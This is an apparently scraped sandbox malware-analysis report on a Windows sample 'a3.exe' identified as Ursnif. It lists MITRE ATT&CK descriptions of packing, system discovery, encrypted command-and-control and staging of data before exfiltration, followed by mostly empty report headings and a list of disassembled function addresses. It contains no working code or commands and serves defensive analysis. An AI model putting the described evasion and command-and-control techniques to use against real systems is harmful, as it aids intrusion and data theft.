Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report a3.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Function 04F63EED, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 222
memoryfiletimeCOMMON

Function 04F6660B, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102
memoryCOMMON

Function 00401497, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 04F6104E, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 00401147, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 00401ED0, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Function 00401000, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 04F66B1C, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 266
memorystringCOMMON

Function 0040185E, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 116
threadsleepsynchronizationCOMMON

Function 04F68701, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 149
timememoryCOMMON

Function 04F62A2B, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72
filetimeCOMMON

Function 00401AA1, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 101
librarystringloaderCOMMON

Function 04F6271A, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54
sleepmemorythreadCOMMON

Function 04F63826, Relevance: 12.2, APIs: 8, Instructions: 203
memoryCOMMON

Function 04F66716, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Function 00401C6B, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 004015B3, Relevance: 7.5, APIs: 5, Instructions: 19
memoryCOMMON

Function 04F683CB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94
memoryCOMMON

Function 04F64529, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83
memoryCOMMON

Function 04F68E6E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57
memoryCOMMON

Function 004012E1, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95
memoryCOMMON

Function 04F65D27, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Function 0040121D, Relevance: 6.1, APIs: 4, Instructions: 61
stringthreadCOMMON

Function 004017B2, Relevance: 4.6, APIs: 3, Instructions: 69
memoryCOMMON

Function 04F642FE, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Function 04F62AF0, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Function 04F68696, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 41
memoryCOMMON

Function 04F6423D, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Function 00401BBE, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Function 04F617DE, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Function 04F6AAF6, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Function 04F6AADB, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Function 00401E3E, Relevance: 1.3, APIs: 1, Instructions: 65
COMMON

Function 04F6655F, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Function 04F6365A, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Function 00401A35, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Function 04F62D68, Relevance: 1.9, APIs: 1, Instructions: 610
COMMONCrypto

Function 04F6B105, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON